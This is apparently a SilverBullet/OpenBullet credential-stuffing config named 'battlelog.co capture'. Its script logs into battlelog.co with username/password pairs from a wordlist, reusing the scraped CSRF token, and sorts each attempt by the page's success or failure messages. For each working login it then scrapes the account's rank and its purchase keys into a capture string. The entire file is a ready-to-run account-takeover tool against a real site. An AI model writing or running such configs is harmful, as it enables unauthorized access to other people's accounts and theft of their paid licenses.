[SETTINGS]
{
  "Name": "battlelog.co capture",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-15T22:51:08.0628051+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "battlelog",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://battlelog.co/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"csrfKey\" value=\"" "\">" -> VAR "tk" 

PARSE "<SOURCE>" LR "name=\"ref\" value=\"" "\">" -> VAR "ref" 

REQUEST POST "https://battlelog.co/login/" 
  CONTENT "csrfKey=<tk>&ref=<ref>&auth=<USER>&password=<PASS>&remember_me=1&_processLogin=usernamepassword" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The display name, email address or password was incorrect." 
  KEYCHAIN Success OR 
    KEY "Welcome to the Battlelog community" 

REQUEST GET "https://battlelog.co/files/category/4-files/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "The page you are trying to access is not available for your account." 
  KEYCHAIN Success OR 
    KEY "This is where all our download files are found." 

PARSE "<SOURCE>" LR "<a href=\"https://battlelog.co/profile/" "/\"" -> VAR "1" 

REQUEST GET "https://battlelog.co/profile/<1>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<span class='ipsPageHead_barText'>" "</span>" -> VAR "Rank" 

REQUEST GET "https://battlelog.co/clients/purchases/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "href='https://battlelog.co/clients/purchases" "'" Recursive=TRUE -> VAR "Keys" 

FUNCTION Translate 
  KEY "[" VALUE "" 
  KEY "]" VALUE "" 
  "<Keys>" -> VAR "ass" 

FUNCTION Split "," 1 "<ass>" -> VAR "1" 

FUNCTION Split "," 2 "<ass>" -> VAR "2" 

FUNCTION Split "," 3 "<ass>" -> VAR "3" 

FUNCTION Split "," 4 "<ass>" -> VAR "4" 

FUNCTION Split "," 5 "<ass>" -> VAR "5" 

FUNCTION Split "," 6 "<ass>" -> VAR "6" 

FUNCTION Constant "Rank = <Rank> ┃ Keys = <1> ┃ <2> ┃ <3> ┃ <4> ┃ <5> ┃ <6> ┃" -> VAR "111" 

FUNCTION Translate 
  KEY "[" VALUE "" 
  "<111>" -> VAR "asss" 

FUNCTION Translate 
  KEY "/" VALUE "" 
  "<asss>" -> CAP "Capture" 

